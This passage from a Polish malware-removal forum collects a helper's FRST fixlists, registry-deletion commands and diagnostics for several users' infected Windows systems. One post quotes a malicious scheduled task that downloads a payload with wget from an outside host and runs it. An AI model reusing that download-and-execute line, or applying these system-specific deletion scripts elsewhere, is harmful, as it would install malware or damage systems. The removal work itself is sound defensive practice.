picasso

Proszę dostarcz raporty wymagane działem, czyli FRST i GMER. Logi z przestarzałego OTL nie są tu już brane pod uwagę.

Kończymy: 1. Usuń narzędzia i logi z folderu C:\Users\Dybek\Desktop\fixxx\fix oraz log GMER z Pobranych. 2. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK.

Wszystko wykonane zgodnie z planem, log końcowy wygląda w porządku. Jeszcze poprawki na odpadki po odinstalowanych programach: Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\ProgramData\Sun RemoveDirectory: C:\Users\Dybek\AppData\Local\Mozilla RemoveDirectory: C:\Users\Dybek\AppData\Roaming\Mozilla Reg: reg delete HKCU\Software\Mozilla /f Reg: reg delete HKLM\SOFTWARE\Mozilla /f Reg: reg delete HKLM\SOFTWARE\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\mozilla.org /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\MozillaPlugins /f Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt.

Post nadal jest na swoim miejscu: KLIK.

Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. Jak najbardziej. Wolny internet: może ESET Smart Security ma jakiś wpływ. Czarny ekran: w którym miejscu się pojawia, przed logo z Windows, przed ekranem logowania? W Dzienniku zdarzeń widzę takie oto błędy: Dziennik System: ============= Error: (11/12/2015 07:47:23 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Windows Phone IP over USB Transport (IpOverUsbSvc). Error: (11/12/2015 07:47:21 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Usługa Szybka instalacja pakietu Microsoft Office z powodu następującego błędu: %%1053 Error: (11/12/2015 07:47:21 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Usługa Szybka instalacja pakietu Microsoft Office. Czyli te dwie usługi się zawieszają: R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2856632 2015-10-15] (Microsoft Corporation) S2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21744 2015-07-09] (Microsoft Corporation) Sprawdź czy będzie poprawa w procesie uruchamiania systemu, gdy je tymczasowo wyłączysz. Klawisz z flagą Windows + X > Zarządzanie komputerem > Usługi i aplikacje > Usługi > wyszukaj Usługa Szybka instalacja pakietu Microsoft Office i Windows Phone IP over USB Transport > z dwukliku pobierz Właściwości i Typ uruchomienia przestaw na Wyłączony. Zresetuj system.

W raportach widzę: zadanie Harmonogramu wstawione przez adware DNS Unlocker, polityki blokujące coś w Google Chrome, zainfekowane pliki DLL Google Chrome (wymagana reinstalacja przeglądarki od zera) oraz inne śmieci. Operacje do wykonania: 1. Odinstaluj stare wersje: Adobe Reader XI (11.0.12) - Polish, Java 8 Update 11 (64-bit), Java SE Development Kit 8 Update 11 (64-bit), Mozilla Firefox 39.0 (x86 pl). Operacje tyczące Google Chrome: Upewnij się, że nie masz włączonej synchronizacji, która załaduje złe ustawienia z serwera po reinstalacji przeglądarki: KLIK. Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML. Odinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki. Na razie nie instaluj przeglądarki ponownie, gdyż w punkcie 2 będzie doczyszczanie obiektów Google. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia Task: {12D19E6B-C5B3-4D5D-B321-E8BCF83736A3} - System32\Tasks\{BC955C43-B254-43C0-946C-702BA06CDBC7} => pcalua.exe -a C:\Users\Dybek\AppData\Roaming\mystartsearch\UninstallManager.exe -c -ptid=smt Task: {39EC624D-DDE5-4E61-8248-E10C6C6BC1C5} - System32\Tasks\Superclean => c:\programdata\{b50b6641-0a1b-d891-b50b-b66410a19904}\hqghumeaylnlf.exe [2014-08-24] (Super PC Tools Ltd) Task: {D0DAAA2A-F738-4E41-9319-23C658A0E17B} - System32\Tasks\DNSKINGSTON => dnskingston.exe Task: C:\Windows\Tasks\Superclean.job => c:\programdata\{b50b6641-0a1b-d891-b50b-b66410a19904}\hqghumeaylnlf.exe S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X] S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X] S0 mv91xx; system32\DRIVERS\mv91xx.sys [X] CustomCLSID: HKU\S-1-5-21-2760842731-4289578809-4065000478-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Dybek\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay => Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=56626&homepage=hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=56626&homepage=hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKU\S-1-5-21-2760842731-4289578809-4065000478-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=56626&homepage=hxxp://www.google.com C:\Program Files (x86)\prefs.js C:\Program Files (x86)\Google C:\ProgramData\{b50b6641-0a1b-d891-b50b-b66410a19904} C:\ProgramData\khlkjigicenalebajemnlmpbclndbpfl C:\Users\Dybek\AppData\Local\{7C95BC24-7AAC-4843-920D-93CB50E1C4E5} C:\Users\Dybek\AppData\Local\setup.txt C:\Users\Dybek\AppData\Local\Temp-log.txt C:\Users\Dybek\AppData\Local\Google C:\Users\Dybek\AppData\Roaming\appdataFr3.bin C:\Users\Dybek\AppData\Roaming\appdataFr25.bin Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f CMD: ipconfig /flushdns EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Dybek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 4. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale bez Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się czy problemy nadal występują.

Tak, to wszystko.

Przeanalizowałam foldery. Nic oczywistego nie widzę, ale już od początku mnie zastanawiało "mało popularne" rozszerzenie Internet traffic economizer, mimo że oficjalnie hostowane w Chrome Web Store. CHR Extension: (Internet traffic economizer) - C:\Users\ryszard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdhmbfholeopafngkafjdljlogobfgmd [2015-11-04] Odinstaluj je i podaj rezultaty czy są pożądane zmiany.

Widać log na dysku, tzn. plik C:\ComboFix.txt. W spoilerze doczyszczanie wpisów odpadkowych, co nie ma związku ze zgłaszanymi problemami. To nie jest problem infekcji. Sugestie wstępne: - Jedyne co w logach widzę, to że Zapora systemu Windows jest wyłączona. Włącz ponownie: Uruchom msconfig, wyszukaj na liście Usługę Zapory systemu Windows (MpsSvc), zaznacz i zresetuj system. - Odinstaluj świeżo doinstalowany cFosSpeed v9.64. Temat przenoszę do działu Sieci. Zasady działu Sieci: KLIK. Jeśli nic z powyższych sugestii nie pomoże, dostarcz te dane. Niestety nie wiem czy ktoś pociągnie temat.

1. AdwCleaner czepia się zadania DriverEasy 4.7.2. Na wszelki wypadek odinstaluj ten program. Takie automaty do aktualizacji sterowników nie są tu zresztą polecane, sterowniki należy precyzyjnie aktualizować ręcznie. 2. Otwórz Notatnik i wklej w nim: DeleteKey: HKCU\Software\InstallCore DeleteKey: HKCU\Software\PRODUCTSETUP DeleteKey: HKCU\Software\Mozilla\Extends DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3} DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5} DeleteKey: HKLM\SOFTWARE\Classes\TypeLib\{A2D733A7-73B0-4C6B-B0C7-06A432950B66} DeleteKey: HKLM\SOFTWARE\istartsurfSoftware DeleteKey: HKLM\SOFTWARE\FFPluginHp DeleteKey: HKLM\SOFTWARE\WdsManPro DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\WdsManPro RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\ProgramData\apn RemoveDirectory: C:\Users\Trojanus\AppData\Roaming\OpenCandy RemoveDirectory: C:\Users\Trojanus\Desktop\Stare dane programu Firefox CMD: del /q C:\Users\Trojanus\Desktop\3yjnyeix.exe Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt.

Temat przenoszę do działu Windows. Log z GMER robiłeś w złych warunkach, co zaciemniło raport, nie wykonany ten punkt: KLIK. A w spoilerze doczyszczanie szczątkowych wpisów, co nie ma znaczenia w kontekście zgłaszanych problemów. Brak tu konkretów, ale nie wykluczony problem sprzętowy. Te obrazki z Blue Screen View mało mówią. Widzę, że masz zainstalowany Debugger Microsoftu, on podaje bardziej szczegółowe dane. Niemniej od razu sugeruję sprawdzić testową deinstalację 360 Total Security - to bardzo inwazyjny soft ładowany przy udziale masy sterowników, może mieć wpływ conajmniej na aspekty zacinania.

Wszystko pomyślnie wykonane. Problem powinien ustąpić. Ale jeszcze poprawki: Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

semiconductor, zasady działu: KLIK. Zakaz podpinania się pod cudze tematy (post zostanie wydzielony w osobny) i brak obowiązkowych logów. 1. Po to są obowiązkowe raporty, które dokładnie pokażą czy są jakieś elementy aktywne i gdzie. 2. Jeśli infekcja nie jest aktywna (a to właśnie nie jest wiadome), nie musisz, najgorsze się bowiem już stało. 3. Nie wiem czy Dysk Google także jest atakowany. Na pewno Dropbox. 4. Instrukcja usuwania / doboru odpowiednich działań zależy od tego jaki jest stan konkretnego systemu. Na razie nie mam żadnych wyobrażeń o tym jaki jest stan Twojego Windowsa. Z pewnością to są te serie fałszywych blogów o usuwaniu malware, których celem głównym jest nakierowanie użytkownika na pobranie reklamowanego tam narzędzia.

Wszystko pomyślnie wykonane. Inne poprawki, w chwili obecnej mało istotne, potem. Zabierz się za odkodowanie plików przy udziale podanego już RakhniDecryptor. Zapewne czytałeś podobny temat na forum, ale ostrzegam na wszelki wypadek: - Narzędzie przeprowadzi atak typu "brute force" na hasło, co oznacza bardzo długą pracę liczoną w godziny a nawet dni. - Podczas tej operacji procesor będzie silnie obciążony przez narzędzie, więc zostawić system w spokoju nie prowadząc żadnych dodatkowych akcji. - Miejsce na dysku będzie "znikać", bo Kaspersky utworzy repliki plików, o ile mu się uda znaleźć hasło. Po ukończeniu procesu zgłoś się tu z wynikami czy odkodowane, czy wszystkie i czy po odkodowaniu pliki działają. Jeśli operacja się powiedzie w 100%, podam skrypt FRST hurtowo usuwający zaszyfrowane kopie z dysków.

W systemie działa infekcja podobna do VBKlip/Banatrix: Task: {10AE26B4-A3E9-4E70-B329-E9BE2629AEE2} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=Y3jnlP7sDo;Counter_Strike_1.6_v23.exe;1437684586 & start cmd /R dat.bmp Ta infekcja manipuluje ze schowkiem, więc pewne objawy mogą się zazębiać, ale nie wszystkie. Na razie usuń infekcję i zobaczymy co z tego wyniknie: 1. Odinstaluj szczątkowe śmieci DAEMON Tools Toolbar, Incredibar Toolbar on IE, vShare.tv plugin 1.3 oraz przestarzały Spybot - Search & Destroy. Jeśli śmieci nie będzie widać, kontynuuj dalej. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {08E9B500-765C-49B8-8A79-AA8A18C6C0BF} - System32\Tasks\{7A4A6E52-80AE-416E-8DD4-038ACFBD66B2} => C:\AVAST Software\Avast\AvastUI.exe Task: {10AE26B4-A3E9-4E70-B329-E9BE2629AEE2} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=Y3jnlP7sDo;Counter_Strike_1.6_v23.exe;1437684586 & start cmd /R dat.bmp Task: {2EBDD549-FA78-4C17-9A95-F09F9CA73C36} - System32\Tasks\e-pity2015_styczen => C:\Program Files\e-file\e-pity2014\Assets\signxml.exe Task: {2FA962EE-C1E9-41B9-B72E-FDC792FE6708} - System32\Tasks\{73FD8A8F-060C-4AAF-92BD-B62C4F9223D5} => pcalua.exe -a F:\CDSETUP.EXE -d F:\ Task: {3B0F575F-B62D-4C6E-A079-D6EA36911DD6} - System32\Tasks\e-pity2013_styczen => C:\Program Files\e-file\e-pity2013\Assets\signxml.exe Task: {5E4C995A-C506-4392-9E66-B2C795D25D86} - System32\Tasks\{EAB91018-14A0-4858-ABBD-60CD613C0720} => pcalua.exe -a "C:\Program Files\InstallShield Installation Information\{8C3727F2-8E37-49E4-820C-03B1677F53B6}\setup.exe" -c -runfromtemp -l0x0009 -removeonly Task: {687091B6-D1F9-4CBF-A341-666E9DF6BB07} - System32\Tasks\{1E57334B-7E41-49EC-AFFE-1B3E069FFBE4} => pcalua.exe -a "C:\Program Files\Common Files\DVDVideoSoft\lib\Uninstall.exe" Task: {91E8FC8B-40C2-4DFC-8AB6-6F934BCDD4C7} - System32\Tasks\e-pity2013_kwiecien => C:\Program Files\e-file\e-pity2013\Assets\signxml.exe Task: {ACB981AF-55E8-4F9B-8650-71CA08F1128F} - System32\Tasks\{F30E8CEC-1395-4794-8170-E4AEB6CFEBF7} => pcalua.exe -a C:\Users\Maciej\Desktop\RegCleaner(dobreprogramy.pl).exe -d C:\Users\Maciej\Desktop Task: {D03AC7C9-2096-408F-A0B1-AD17D9F123E3} - System32\Tasks\{5FAFB038-351B-404D-A0AE-58D3D1A91379} => C:\AVAST Software\Avast\AvastUI.exe Task: {E1E5641B-4E3B-47DD-96F8-4564CB514D89} - System32\Tasks\{929CADC3-B236-42AE-A6F5-4563779DF969} => pcalua.exe -a C:\Pobieranie\Sony_Ericsson_Drivers_3.5.3.0.exe -d "C:\Mozilla Firefox" Task: {EB3FACC2-2AE0-4327-A755-4F7AF2C4B2F0} - System32\Tasks\e-pity2015_kwiecien => C:\Program Files\e-file\e-pity2014\Assets\signxml.exe Task: {F9E7B691-A630-4E30-97A9-B633C665AB79} - System32\Tasks\{49EB771A-4865-44EA-93B4-5B59FABA6457} => pcalua.exe -a C:\Pobieranie\CBuilder6Personal\INSTALL.EXE -d C:\Pobieranie\CBuilder6Personal S3 Cardex; \??\C:\Windows\system32\drivers\TBPANEL.SYS [X] S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] Winlogon\Notify\SDWinLogon: SDWinLogon.dll [X] HKU\S-1-5-21-227159230-626954009-1044769965-1000\...\Run: [AVG-Secure-Search-Update_0913b] => C:\Users\Maciej\AppData\Roaming\AVG 0913b Campaign\AVG-Secure-Search-Update-0913b.exe /PROMPT --mid 841e7423ac6f47d0a35ed154d43bfa55-d1113e44ae21302e57bdbc3bdf4438affb0710ff --CMPID 0913b ShellIconOverlayIdentifiers: [GGDriveOverlay1] -> {E68D0A50-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay2] -> {E68D0A51-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay3] -> {E68D0A52-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay4] -> {E68D0A53-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku CustomCLSID: HKU\S-1-5-21-227159230-626954009-1044769965-1000_Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32 -> C:\Users\Maciej\AppData\LocalLow\Unity\WebPlayer\loader\UnityWebPluginAX.ocx => Brak pliku CustomCLSID: HKU\S-1-5-21-227159230-626954009-1044769965-1000_Classes\CLSID\{C5A2122B-A05B-4FD8-AE49-91990AE10998}\InprocServer32 -> C:\Users\Maciej\AppData\Local\Google\Update\1.3.21.115\psuser.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-227159230-626954009-1044769965-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Maciej\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-227159230-626954009-1044769965-1000_Classes\CLSID\{FB994D36-B312-46CE-A40B-CF63980641F9}\InprocServer32 -> C:\Users\Maciej\AppData\Local\Google\Update\1.3.21.111\psuser.dll => Brak pliku BootExecute: autocheck autochk * /sync /restart /sync /restart /sync /restartsdnclean.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = SearchScopes: HKU\S-1-5-21-227159230-626954009-1044769965-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab DPF: {CAFEEFAC-0017-0000-0005-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_05-windows-i586.cab DPF: {CAFEEFAC-0017-0000-0051-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab FF Plugin HKU\S-1-5-21-227159230-626954009-1044769965-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Maciej\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [brak pliku] FF HKLM\...\Firefox\Extensions: [{ACAA314B-EEBA-48e4-AD47-84E31C44796C}] - C:\Program Files\Common Files\DVDVideoSoft\plugins\ff FF HKLM\...\Firefox\Extensions: [pdf_architect_3_conv@pdfarchitect.org] - C:\Program Files\PDF Architect 3\resources\pdfarchitect3firefoxextension CHR StartupUrls: Default -> "hxxp://do-search.com/?type=hp&ts=1430335197&from=cor&uid=ST3500320AS_9QM2ZQMQXXXX9QM2ZQMQ" C:\ProgramData\dat.bmp C:\ProgramData\wget.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autonomiczny składnik AVG LinkScanner C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVDVideoSoft\Programs\Free YouTube to iPod Converter.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OCCT C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenOffice.org 3.4.1 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QPrinter Bookmaker C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RAR Password Recovery C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sierra C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XTCS Counter-Strike 1.6 Final Release C:\Users\Gość\AppData\Local\Microsoft\Windows\GameExplorer\{F86210CB-EE92-4C63-8D4D-A266B34FC82B} C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\XTCS Counter-Strike 1.6 Final Release.lnk C:\Users\Gość\Desktop\XTCS Counter-Strike 1.6 Final Release.lnk C:\Users\Maciej\AppData\Local\*.html C:\Users\Maciej\AppData\Local\Google\Chrome\User Data\Default\Preferences C:\Users\Maciej\AppData\Local\Google\Chrome\User Data\Default\Web Data C:\Users\Maciej\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\XTCS Counter-Strike 1.6 Final Release.lnk C:\Users\Maciej\AppData\Roaming\Microsoft\Office\Niedawny\*.LNK C:\Users\UpdatusUser\Desktop\*.lnk C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\*.lnk C:\Windows\pss\Secunia PSI Tray.lnk.CommonStartup CMD: netsh advfirewall reset Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Secunia PSI Tray.lnk" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe Reader Speed Launcher" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AVG_TRAY" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\FixMyRegistry" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\KiesHelper" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\KiesPDLR" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\KiesTrayAgent" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\OrderReminder" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\QPrinter 2.0 monitor" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Samsung_AppInst" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SDTray" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SpeedUpMyComputer" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\vProt" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale bez Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się które objawy nadal mają miejsce.

Temat przenoszę do działu Windows. To nie jest problem infekcji. Tylko minimalne odpadki adware widać, ale to absolutnie nie ma związku z objawami. Drobna korekta w Google Chrome: - Zresetuj synchronizację (o ile włączona): KLIK. - Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń wszystkie wystąpienia mystartsearch.com i oursurfing.com, przestaw na "Otwórz stronę nowej karty". Z raportów nic kompletnie nie wynika. Ewentualnie zwracają uwagę te błędy: Dziennik System: ============= Error: (11/13/2015 09:09:14 PM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: Menedżer sterowania usługami próbował podjąć akcję korekcyjną (Uruchom usługę ponownie) po nieoczekiwanym zakończeniu usługi Magazyn danych użytkownika_Session1, ale ta akcja nie powiodła się przy następującym błędzie: %%1056. Error: (11/13/2015 09:09:09 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Magazyn danych użytkownika_Session1. Error: (11/13/2015 09:09:09 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Magazyn danych użytkownika_Session1. Error: (11/13/2015 09:09:09 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Magazyn danych użytkownika_Session1. Error: (11/13/2015 09:09:08 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Magazyn danych użytkownika_Session1. Co to znaczy "uruchamia się dopiero za drugim razem" - czy stoi na jakimś ekranie długo (i jakim), a może tylko czarny ekran lub inne objawy? Duże zużycie RAM: których procesów tyczy? Otwórz Menedżer zadań Windows 10 i zrób zrzuty ekranu z kart Procesy i Szczegóły, tak by było widać dobrze wszystkie statystyki.

W tle działają szkodliwe usługi (StdLib i WdsManPro), w Firefox jest adware Default SearchProtected, prócz tego różne przekierowania adware tu i ówdzie. Log sugeruje, że adware nabyłeś z portalu dobreprogramy.pl przy udziale "Asystenta pobierania": KLIK. Akcje do przeprowadzenia: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R1 {6fcd6092-9615-4f7f-8898-8df53980e5d2}Gw; C:\Windows\System32\drivers\{6fcd6092-9615-4f7f-8898-8df53980e5d2}Gw.sys [52920 2014-07-03] (StdLib) R2 WdsManPro; C:\ProgramData\MWMiniProM\WMiniPro.exe [301704 2015-10-26] (DTools LIMITED) S1 itdrvr_vt_1_10_0_25; system32\drivers\itdrvr_vt_1_10_0_25.sys [X] S2 Update NetCrawl; "C:\Program Files\NetCrawl\updateNetCrawl.exe" [X] FF HKLM\...\Firefox\Extensions: [defsearchp@gmail.com] - C:\Users\Trojanus\AppData\Roaming\Mozilla\Firefox\Profiles\x1fb8oud.default\extensions\defsearchp@gmail.com => nie znaleziono FF HKLM\...\Firefox\Extensions: [deskCutv2@gmail.com] - C:\Users\Trojanus\AppData\Roaming\Mozilla\Firefox\Profiles\x1fb8oud.default\extensions\deskCutv2@gmail.com => nie znaleziono SearchScopes: HKU\S-1-5-21-3383111068-4089164496-2276131000-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.istartsurf.com/?type=sc&ts=1445853507&z=8e4e78fdc658c3082eb5db3g9z2zcw1bawec2o4wdz&from=cor&uid=SAMSUNGXHM100JI_S0EDJ10LB00082 Task: {88951C80-52C2-4ECF-9F39-2134E2C968AF} - System32\Tasks\{26FE425E-F6E6-4AAC-92F4-9486A6078322} => pcalua.exe -a C:\Users\Trojanus\AppData\Roaming\Easeware\DriverEasy\drivers\rgqlscqm.1bd\x86\setup.exe -d C:\Users\Trojanus\AppData\Roaming\Easeware\DriverEasy\drivers\rgqlscqm.1bd\x86 Task: {DEF06930-CC11-423D-866E-E09C4C040059} - 